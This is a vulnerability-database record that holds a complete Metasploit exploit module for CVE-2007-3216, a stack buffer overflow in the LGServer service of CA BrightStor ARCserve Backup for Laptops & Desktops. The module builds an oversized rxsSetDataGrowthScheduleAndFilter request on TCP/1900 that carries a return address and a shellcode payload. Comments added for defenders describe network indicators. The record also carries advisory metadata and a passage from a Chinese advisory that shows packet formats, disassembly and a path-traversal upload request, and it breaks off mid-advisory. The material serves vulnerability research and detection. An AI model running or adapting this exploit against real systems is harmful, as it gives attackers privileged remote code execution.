ID PACKETSTORM:95525
Type packetstorm
Reporter MC
Modified 2010-11-05T00:00:00
Description
`##
# $Id: $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
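# Metasploit module for CVE-2007-3216: a stack buffer overflow in the LGServer
# service of CA BrightStor ARCserve Backup for Laptops & Desktops 11.1, reached
# through the rxsSetDataGrowthScheduleAndFilter command.
#
# Notes for defenders, all taken from the module itself:
# * The service is addressed on TCP/1900 (the registered default RPORT).
# * The request names rxsSetDataGrowthScheduleAndFilter and carries an argument
#   padded to 25000 bytes, so a request of that size for this command on that
#   port is a usable network indicator.
# * The module declares 'Privileged' => true, so a successful run is expected
#   to give code execution in a privileged context.
# * The only listed target is Windows 2000 SP4 English, with a fixed return
#   address. A miss on other builds says nothing about whether they are
#   patched.
class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata (references, payload constraints, target)
  # and the default remote port.
  #
  # @param info [Hash] caller-supplied metadata merged through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow',
      # The description text stays flush-left so the bytes of the literal are unchanged.
      'Description' => %q{
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
for Laptops & Desktops 11.1. By sending a specially crafted request (rxsSetDataGrowthScheduleAndFilter),
an attacker could overflow the buffer and execute arbitrary code.
},
      'Author' => [ 'MC' ],
      'License' => MSF_LICENSE,
      'Version' => '$Revision: 10892 $',
      'References' =>
        [
          [ 'CVE', '2007-3216' ],
          [ 'OSVDB', '35329' ],
          [ 'BID', '24348' ],
        ],
      'Privileged' => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload' =>
        {
          'Space' => 700,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Windows 2000 SP4 English', { 'Ret' => 0x75031dce } ],
        ],
      'DisclosureDate' => 'Jun 6 2007',
      'DefaultTarget' => 0))

    register_options([ Opt::RPORT(1900) ], self.class)
  end

  # Fingerprints the remote service by requesting its version string.
  #
  # Sends the rxrGetServerVersion request and looks for build 11.1.742 in the
  # reply. This is a banner comparison only: it shows which build answered,
  # not whether a vendor fix has been applied on top of it, so treat a
  # Vulnerable result as "needs verification against the vendor advisory".
  #
  # @return [Exploit::CheckCode::Vulnerable] when the reply contains "11.1.742"
  # @return [Exploit::CheckCode::Safe] for any other reply, including none
  def check
    connect

    begin
      sock.put("0000000019rxrGetServerVersion")
      ver = sock.get_once
    ensure
      # Release the socket even when the write or the read raises.
      disconnect
    end

    # The dots are escaped so only the literal build string matches; unescaped,
    # "." accepts any character and other version strings could be reported as
    # vulnerable. to_s covers a read that returned nothing.
    return Exploit::CheckCode::Vulnerable if ver.to_s =~ /11\.1\.742/

    Exploit::CheckCode::Safe
  end

  # Sends a single oversized rxsSetDataGrowthScheduleAndFilter request to the
  # selected target and then hands control to the framework's session handler.
  #
  # The argument is built to a fixed 25000 bytes (filler, the target's return
  # address, the encoded payload, trailing filler). The filler is random
  # upper-case letters, so detection should key on the command name, the port
  # and the argument size rather than on fixed filler bytes.
  def exploit
    connect

    data = rand_text_alpha_upper(20080) + [target.ret].pack('V')
    data << payload.encoded + rand_text_alpha_upper(25000 - 20084 - payload.encoded.length)

    sploit = "0000025000" # Command Length Field
    sploit << "rxsSetDataGrowthScheduleAndFilter" # RPC Command
    sploit << "~~" # Constant Argument Delimiter
    sploit << data

    print_status("Trying target #{target.name}...")
    sock.put(sploit)

    handler
    disconnect
  end
end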
`
{"modified": "2010-11-05T00:00:00", "reporter": "MC", "history": [], "references": [], "href": "https://packetstormsecurity.com/files/95525/CA-BrightStor-ARCserve-for-Laptops-Desktops-LGServer-rxsSetDataGrowthScheduleAndFilter-Buffer-Overflow.html", "viewCount": 0, "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow", "id": "PACKETSTORM:95525", "lastseen": "2016-12-05T22:20:55", "objectVersion": "1.2", "type": "packetstorm", "edition": 1, "sourceData": "`## \n# $Id: $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \nRank = AverageRanking \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup \nfor Laptops & Desktops 11.1. By sending a specially crafted request (rxsSetDataGrowthScheduleAndFilter), \nan attacker could overflow the buffer and execute arbitrary code. 
\n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 10892 $', \n'References' => \n[ \n[ 'CVE', '2007-3216' ], \n[ 'OSVDB', '35329' ], \n[ 'BID', '24348' ], \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 700, \n'BadChars' => \"\\x00\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows 2000 SP4 English', { 'Ret' => 0x75031dce } ], \n], \n'DisclosureDate' => 'Jun 6 2007', \n'DefaultTarget' => 0)) \n \nregister_options([ Opt::RPORT(1900) ], self.class) \nend \n \ndef check \n \nconnect \n \nsock.put(\"0000000019rxrGetServerVersion\") \nver = sock.get_once \n \ndisconnect \n \nif ( ver =~ /11.1.742/ ) \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Safe \n \nend \n \ndef exploit \n \nconnect \n \ndata = rand_text_alpha_upper(20080) + [target.ret].pack('V') \ndata << payload.encoded + rand_text_alpha_upper(25000 - 20084 - payload.encoded.length) \n \nsploit = \"0000025000\" # Command Length Field \nsploit << \"rxsSetDataGrowthScheduleAndFilter\" # RPC Command \nsploit << \"~~\" # Constant Argument Delimiter \nsploit << data \n \nprint_status(\"Trying target #{target.name}...\") \nsock.put(sploit) \n \nhandler \ndisconnect \n \nend \n \nend \n`\n", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "2b88df3d48825de63c1c1029ba367557"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "cc2ce6fd6ca0cf4c916c92e4f077e6a0"}, {"key": "modified", "hash": "0ea0847bba78aab0f6b7dd369fa89c31"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "0ea0847bba78aab0f6b7dd369fa89c31"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": 
"92a54b358b4cf53cca4095e4697e1004"}, {"key": "sourceData", "hash": "3cd76f39802f377ed6f5d22c5a0542f3"}, {"key": "sourceHref", "hash": "abfdc6ff9d1188b2036b0b5e2fb612f7"}, {"key": "title", "hash": "b23295689999e99382fcf9dda0945292"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "published": "2010-11-05T00:00:00", "description": "", "cvelist": ["CVE-2007-3216"], "sourceHref": "https://packetstormsecurity.com/files/download/95525/lgserver_rxssetdatagrowthscheduleandfilter.rb.txt", "hash": "06f7a23ad2b7213f10a5e4f4b2e93c3fe6ad0864916a4f80cd6c865ffe501a93", "enchantments": {"vulnersScore": 7.5}}
{"result": {"cve": [{"id": "CVE-2007-3216", "type": "cve", "title": "CVE-2007-3216", "description": "Multiple buffer overflows in the LGServer component of CA (Computer Associates) BrightStor ARCserve Backup for Laptops and Desktops r11.1 allow remote attackers to execute arbitrary code via crafted arguments to the (1) rxsAddNewUser, (2) rxsSetUserInfo, (3) rxsRenameUser, (4) rxsSetMessageLogSettings, (5) rxsExportData, (6) rxsSetServerOptions, (7) rxsRenameFile, (8) rxsACIManageSend, (9) rxsExportUser, (10) rxsImportUser, (11) rxsMoveUserData, (12) rxsUseLicenseIni, (13) rxsLicGetSiteId, (14) rxsGetLogFileNames, (15) rxsGetBackupLog, (16) rxsBackupComplete, (17) rxsSetDataProtectionSecurityData, (18) rxsSetDefaultConfigName, (19) rxsGetMessageLogSettings, (20) rxsHWDiskGetTotal, (21) rxsHWDiskGetFree, (22) rxsGetSubDirs, (23) rxsGetServerDBPathName, (24) rxsSetServerOptions, (25) rxsDeleteFile, (26) rxsACIManageSend, (27) rxcReadBackupSetList, (28) rxcWriteConfigInfo, (29) rxcSetAssetManagement, (30) rxcWriteFileListForRestore, (31) rxcReadSaveSetProfile, (32) rxcInitSaveSetProfile, (33) rxcAddSaveSetNextAppList, (34) rxcAddSaveSetNextFilesPathList, (35) rxcAddNextBackupSetIncWildCard, (36) rxcGetRevisions, (37) rxrAddMovedUser, (38) rxrSetClientVersion, or (39) rxsSetDataGrowthScheduleAndFilter commands.", "published": "2007-06-14T18:30:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3216", "cvelist": ["CVE-2007-3216"], "lastseen": "2017-07-29T11:22:05"}], "saint": [{"id": "SAINT:58F4061114E890C4F0819ADA685DFAB3", "type": "saint", "title": "BrightStor ARCserve Backup LGServer rxsUseLicenseIni buffer overflow", "description": "Added: 01/11/2008 \nCVE: [CVE-2007-3216](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3216>) \nBID: [24348](<http://www.securityfocus.com/bid/24348>) \nOSVDB: [35329](<http://www.osvdb.org/35329>) \n\n\n### 
Background\n\n[BrightStor ARCserve Backup for Laptops and Desktops](<http://www.ca.com/us/products/product.aspx?id=263>) is an automated backup solution optimized for low-bandwidth, intermittent network connections. \n\n### Problem\n\nA buffer overflow vulnerability in the `**rxsUseLicenseIni**` function allows remote attackers to execute arbitrary commands by sending a specially crafted request to the LGServer on port 1900. \n\n### Resolution\n\nApply one of the updates referenced in the [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/caarcservebld-securitynotice.asp>). \n\n### References\n\n<http://www.frsirt.com/english/advisories/2007/2121> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup for Laptops and Desktops 11.1 SP1. \n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "published": "2008-01-11T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_rxsuselicenseini", "cvelist": ["CVE-2007-3216"], "lastseen": "2016-12-14T16:58:03"}, {"id": "SAINT:3B169CAD3745422661F668D355838E33", "type": "saint", "title": "BrightStor ARCserve Backup LGServer rxsUseLicenseIni buffer overflow", "description": "Added: 01/11/2008 \nCVE: [CVE-2007-3216](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3216>) \nBID: [24348](<http://www.securityfocus.com/bid/24348>) \nOSVDB: [35329](<http://www.osvdb.org/35329>) \n\n\n### Background\n\n[BrightStor ARCserve Backup for Laptops and Desktops](<http://www.ca.com/us/products/product.aspx?id=263>) is an automated backup solution optimized for low-bandwidth, intermittent network connections. \n\n### Problem\n\nA buffer overflow vulnerability in the `**rxsUseLicenseIni**` function allows remote attackers to execute arbitrary commands by sending a specially crafted request to the LGServer on port 1900. 
\n\n### Resolution\n\nApply one of the updates referenced in the [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/caarcservebld-securitynotice.asp>). \n\n### References\n\n<http://www.frsirt.com/english/advisories/2007/2121> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup for Laptops and Desktops 11.1 SP1. \n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "published": "2008-01-11T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_rxsuselicenseini", "cvelist": ["CVE-2007-3216"], "lastseen": "2016-10-03T15:01:55"}, {"id": "SAINT:3081A95B6A8579C20E90845521890B2D", "type": "saint", "title": "BrightStor ARCserve Backup LGServer rxsUseLicenseIni buffer overflow", "description": "Added: 01/11/2008 \nCVE: [CVE-2007-3216](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3216>) \nBID: [24348](<http://www.securityfocus.com/bid/24348>) \nOSVDB: [35329](<http://www.osvdb.org/35329>) \n\n\n### Background\n\n[BrightStor ARCserve Backup for Laptops and Desktops](<http://www.ca.com/us/products/product.aspx?id=263>) is an automated backup solution optimized for low-bandwidth, intermittent network connections. \n\n### Problem\n\nA buffer overflow vulnerability in the `**rxsUseLicenseIni**` function allows remote attackers to execute arbitrary commands by sending a specially crafted request to the LGServer on port 1900. \n\n### Resolution\n\nApply one of the updates referenced in the [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/caarcservebld-securitynotice.asp>). \n\n### References\n\n<http://www.frsirt.com/english/advisories/2007/2121> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup for Laptops and Desktops 11.1 SP1. 
\n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "published": "2008-01-11T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_rxsuselicenseini", "cvelist": ["CVE-2007-3216"], "lastseen": "2017-01-10T14:03:43"}], "exploitdb": [{"id": "EDB-ID:16409", "type": "exploitdb", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow", "description": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow. CVE-2007-3216. Remote exploit for windows platform", "published": "2010-11-03T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16409/", "cvelist": ["CVE-2007-3216"], "lastseen": "2016-02-01T23:48:16"}, {"id": "EDB-ID:16415", "type": "exploitdb", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer rxsSetDataGrowthScheduleAndFilter Buffer Overflow", "description": "CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow. CVE-2007-3216. Remote exploit for windows pla...", "published": "2011-03-10T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16415/", "cvelist": ["CVE-2007-3216"], "lastseen": "2016-02-01T23:49:06"}, {"id": "EDB-ID:16416", "type": "exploitdb", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow", "description": "CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow. CVE-2007-3216. 
Remote exploit for windows platform", "published": "2010-11-04T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16416/", "cvelist": ["CVE-2007-3216"], "lastseen": "2016-02-01T23:49:16"}], "packetstorm": [{"id": "PACKETSTORM:83135", "type": "packetstorm", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow", "description": "", "published": "2009-11-26T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/83135/CA-BrightStor-ARCserve-for-Laptops-Desktops-LGServer-Buffer-Overflow.html", "cvelist": ["CVE-2007-3216"], "lastseen": "2016-12-05T22:11:43"}, {"id": "PACKETSTORM:95523", "type": "packetstorm", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow", "description": "", "published": "2010-11-05T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/95523/CA-BrightStor-ARCserve-for-Laptops-Desktops-LGServer-Multiple-Commands-Buffer-Overflow.html", "cvelist": ["CVE-2007-3216"], "lastseen": "2016-12-05T22:23:31"}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/LGSERVER_MULTI", "type": "metasploit", "title": "CA BrightStor ARCserve for Laptops and Desktops LGServer Multiple Commands Buffer Overflow", "description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. 
By sending a specially crafted request to multiple commands, an attacker could overflow the buffer and execute arbitrary code.", "published": "2010-11-04T22:19:26", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2007-3216"], "lastseen": "2018-03-15T12:02:57"}, {"id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/LGSERVER_RXSSETDATAGROWTHSCHEDULEANDFILTER", "type": "metasploit", "title": "CA BrightStor ARCserve for Laptops and Desktops LGServer rxsSetDataGrowthScheduleAndFilter Buffer Overflow", "description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request (rxsSetDataGrowthScheduleAndFilter), an attacker could overflow the buffer and execute arbitrary code.", "published": "2010-11-04T01:51:54", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2007-3216"], "lastseen": "2018-02-24T18:58:23"}, {"id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/LGSERVER_RXSUSELICENSEINI", "type": "metasploit", "title": "CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow", "description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. 
By sending a specially crafted request (rxsUseLicenseIni), an attacker could overflow the buffer and execute arbitrary code.", "published": "2008-08-02T15:03:13", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2007-3216"], "lastseen": "2018-02-27T21:00:25"}], "osvdb": [{"id": "OSVDB:35329", "type": "osvdb", "title": "CA BrightStor ARCserve Backup for Laptops & Desktops Multiple Overflows", "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/bsabld-securitynotice.asp)\nSecurity Tracker: 1018216\n[Secunia Advisory ID:25606](https://secuniaresearch.flexerasoftware.com/advisories/25606/)\nOther Advisory URL: http://research.eeye.com/html/advisories/upcoming/20070604.html\nFrSIRT Advisory: ADV-2007-2121\n[CVE-2007-3216](https://vulners.com/cve/CVE-2007-3216)\nBugtraq ID: 24348\n", "published": "2007-06-04T14:48:44", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:35329", "cvelist": ["CVE-2007-3216"], "lastseen": "2017-04-28T13:20:31"}], "seebug": [{"id": "SSV:2247", "type": "seebug", "title": "CA ARCserve Backup\u591a\u4e2a\u8fdc\u7a0b\u6ea2\u51fa\u53ca\u76ee\u5f55\u904d\u5386\u6f0f\u6d1e", "description": "BUGTRAQ ID: 24348\r\nCVE(CAN) ID: CVE-2007-3216,CVE-2007-5003,CVE-2007-5004,CVE-2007-5005,CVE-2007-5006\r\n\r\nARCServe Backup for Laptops and Desktops (L&D)\u662f\u9002\u7528\u4e8e\u4e2d\u5c0f\u4e1a\u52a1\u7684ARCServe Backup\u5907\u4efd\u5de5\u5177\u7248\u672c\u3002\r\n\r\nARCserve L&D\u5728\u5904\u7406RPC\u63a5\u53e3\u4e0a\u7684\u7578\u5f62\u8bf7\u6c42\u6570\u636e\u65f6\u5b58\u5728\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u63a7\u5236\u670d\u52a1\u5668\u6216\u6267\u884c\u76ee\u5f55\u904d\u5386\u3002\r\n\r\nARCserve 
L&D\u4f7f\u7528TCP/1900\u7aef\u53e3\u505a\u4e3aRPC\u63a5\u53e3\u7ba1\u7406ARCserve L&D\u670d\u52a1\u5668\uff0c\u6b63\u5e38\u7684\u901a\u8baf\u793a\u4f8b\u5982\u4e0b\uff1a\r\n\r\n 0000000027rxrLogin~~administrator\r\n ---------------------------------------------\r\n Field 1: 10-digit base10 command length field ("0000000027")\r\n Field 2: RPC command ("rxrLogin")\r\n Field 3: Constant Argument Delimiter ("~~")\r\n Field 4: Argument ("administrator")\r\n\r\n#1 \u8ba4\u8bc1\u7528\u6237\u540d\u7f13\u51b2\u533a\u6ea2\u51fa\r\n\r\nrxRPC.dll\u7684\u8ba4\u8bc1\u90e8\u5206\uff08\u901a\u8fc7TCP/1900\u8bbf\u95ee\uff09\u4e2d\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\u3002\u5408\u6cd5\u7684\u8ba4\u8bc1\u62a5\u6587\u793a\u4f8b\u5982\u4e0b\uff1a\r\n\r\n 0000000013rxrLogin~~administrator\r\n\r\n\u8ba4\u8bc1\u65f6\u4f7f\u7528wsprintfW\u5c06administrator\u53c2\u6570\u62f7\u8d1d\u5230\u4e86\u6808\u4e0a0x1AC\u5927\u5c0f\u7684\u7f13\u51b2\u533a\uff0c\u4f46\u6ca1\u6709\u6267\u884c\u5b57\u7b26\u4e32\u957f\u5ea6\u68c0\u67e5\uff0c\u5982\u679c\u5728\u7b2c\u4e00\u4e2a\u8ba4\u8bc1\u8bf7\u6c42\u4e2d\u53d1\u9001\u4e86\u8d85\u957f\u7528\u6237\u540d\u7684\u8bdd\u5c31\u53ef\u4ee5\u89e6\u53d1\u53ef\u5229\u7528\u7684\u6ea2\u51fa\u3002\r\n\r\n#2 \u8ba4\u8bc1\u53e3\u4ee4\u7f13\u51b2\u533a\u6ea2\u51fa\r\n\r\nrxRPC.dll\u7684\u8ba4\u8bc1\u90e8\u5206\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\u3002\u5e26\u6709\u53e3\u4ee4\u7684\u5408\u6cd5\u8ba4\u8bc1\u8bf7\u6c42\u793a\u4f8b\u5982\u4e0b\uff1a\r\n\r\n 1: 0000000030rxrLogin~~administrator~~0000200\r\n 2: 
MyPasswordIs1234\r\n\r\n\u7b2c\u4e00\u4e2arxrLogin\u8bf7\u6c42\u7684\u7b2c\u4e8c\u4e2a\u53c2\u6570\u5b9a\u4e49\u4e86\u4e0b\u4e00\u4e2a\u8bf7\u6c42\u4e2d\u6240\u8981\u53d1\u9001\u53e3\u4ee4\u7684\u957f\u5ea6\u3002\u5c3d\u7ba1\u5df2\u7ecf\u9a8c\u8bc1\u4e86\u7b2c\u4e8c\u4e2a\u8bf7\u6c42\u4e2d\u7684\u53e3\u4ee4\u5b57\u7b26\u4e32\u957f\u5ea6\u4e3a\u6b63\u786e\u7684\u957f\u5ea6\uff0c\u4f46\u6ca1\u6709\u5bf9\u53e3\u4ee4\u957f\u5ea6\u6267\u884c\u8fb9\u754c\u68c0\u67e5\u3002\u5982\u679c\u5728\u7b2c\u4e8c\u4e2a\u8bf7\u6c42\u4e2d\u7684\u8d85\u957f\u53e3\u4ee4\u6307\u5b9a\u4e86\u8d85\u957f\u53e3\u4ee4\u957f\u5ea6\u7684\u8bdd\uff0c\u5c31\u4f1a\u6ea2\u51fa\u53e3\u4ee4\u5b57\u7b26\u4e32\u76ee\u7684\u5730\u6240\u4f7f\u7528\u7684\u6808\u7f13\u51b2\u533a\u3002\r\n\r\n#3 \u8ba4\u8bc1\u53e3\u4ee4\u6574\u6570\u6ea2\u51fa\r\n\r\nrxRPC.dll\u7684\u8ba4\u8bc1\u90e8\u5206\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\u3002\u5e26\u6709\u65e0\u6548\u53e3\u4ee4\u7684\u5408\u6cd5\u8ba4\u8bc1\u8bf7\u6c42\u793a\u4f8b\u5982\u4e0b\uff1a\r\n\r\n 1: 0000000030rxrLogin~~administrator~~18\r\n 2: 000000000000000000\r\n\r\n\u52a0\u5bc6\u7684\u65e0\u6548\u53e3\u4ee4\u53ef\u80fd\u5bfc\u81f4\u53ef\u5229\u7528\u7684\u60c5\u51b5\uff1a\r\n\r\n .text: 00231F24 mov cl, [esi+8]\r\n .text: 00231F27 and ecx, 0x0F\r\n .text: 00231F2A add esp, 8\r\n .text: 00231F2D dec ecx ; XXXX Integer Overflow If ECX = 0\r\n .text: 00231F2E mov [esp+0x7C+var_6C], eax\r\n .text: 00231F32 mov dwPasswordCopyLength, ecx\r\n .text: 00231F38 mov eax, ecx\r\n .text: 00231F3A lea esi, [esp+0x7C+var_6C]\r\n .text: 00231F3E mov edi, ebx\r\n .text: 00231F40 shr ecx, 2\r\n .text: 00231F43 rep movs ; XXXX EXCEPTION: HITS PAGE BOUNDARY 
XXXX\r\n\r\n\u6e90\u7f13\u51b2\u533a\u4e2d\u7684\u6570\u636e\u5305\u542b\u6709\u5927\u91cf\u4e0d\u53ef\u63a7\u7684\u6570\u636e\uff0c\u4f46\u8fd8\u5b58\u5728\u7528\u6237\u540d\u7684\u62f7\u8d1d\uff0c\u56e0\u6b64\u5982\u679c\u5728\u539f\u59cb\u62a5\u6587\u4e2d\u6307\u5b9a\u4e86\u8d85\u957f\u7528\u6237\u540d\u7684\u8bdd\u5c31\u4f1a\u8986\u76d6\u5f02\u5e38\u5904\u7406\u5668\u3002\r\n\r\n#4 \u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\r\n\r\nrxRPC.dll\u7684\u672a\u7ecf\u8ba4\u8bc1\u901a\u8baf\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u3002\u4e0a\u4f20\u8bf7\u6c42\u7684\u6587\u4ef6\u793a\u4f8b\u5982\u4e0b\uff1a\r\n\r\n 1: 0000000056rxrReceiveFileFromServer~~8~~test1234.txt~~4~~3675727989\r\n 2: 0000000031~~<file_contents>\r\n\r\n\u8bf7\u6c42\u7684\u7b2c\u4e00\u4e2a\u53c2\u6570\u6307\u5b9a\u4e86rxrReceiveFileFromServer\u7684\u5b50\u547d\u4ee4\uff0c\u6570\u5b578\u8868\u793a\u6587\u4ef6\u4f1a\u4e0a\u4f20\u5230ARCserve L&D\u7684\u5b89\u88c5\u76ee\u5f55\uff1b\u7b2c\u4e8c\u4e2a\u53c2\u6570\u6307\u5b9a\u4e86\u6587\u4ef6\u76ee\u6807\u540d\u79f0\uff1b\u7b2c\u4e09\u4e2a\u53c2\u6570\u6307\u5b9a\u4e86\u76ee\u6807\u6587\u4ef6\u7684\u957f\u5ea6\uff1b\u7b2c\u4e94\u4e2a\u53c2\u6570\u6307\u5b9a\u4e86\u5165\u7ad9\u6587\u4ef6\u7684CRC32\u54c8\u5e0c\u3002\r\n\r\n\u4f46rxRPC.dll\u6ca1\u6709\u9632\u8303\u901a\u8fc7\u5b50\u51fd\u65708\u7684\u76ee\u5f55\u904d\u5386\uff0c\u56e0\u6b64\u5982\u679c\u6587\u4ef6\u540d\u4e2d\u5305\u542b\u6709\u201c..\\\u201d\u7684\u8bdd\uff0c\u5c31\u53ef\u80fd\u5bfc\u81f4\u4ee5\u7cfb\u7edf\u7ea7\u6743\u9650\u5411\u4efb\u610f\u76ee\u5f55\u5199\u5165\u4efb\u610f\u6587\u4ef6\u3002\r\n\r\n#5 \u591a\u4e2a\u7c7b\u4f3c\u7684\u7f13\u51b2\u533a\u6ea2\u51fa\r\n\r\n\u6709\u516b\u4e2a\u901a\u8fc7TCP/1900\u7aef\u53e3\u53ef\u8bbf\u95ee\u7684\u51fd\u6570\u4e2d\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u793a\u4f8b\u5982\u4e0b\uff1a\r\n\r\n rxsUseLicenseIni~~<overflow>\r\n rxsLicGetSiteId~~<overflow>\r\n rxsGetLogFileNames~~<overflow>~~40000\r\n 
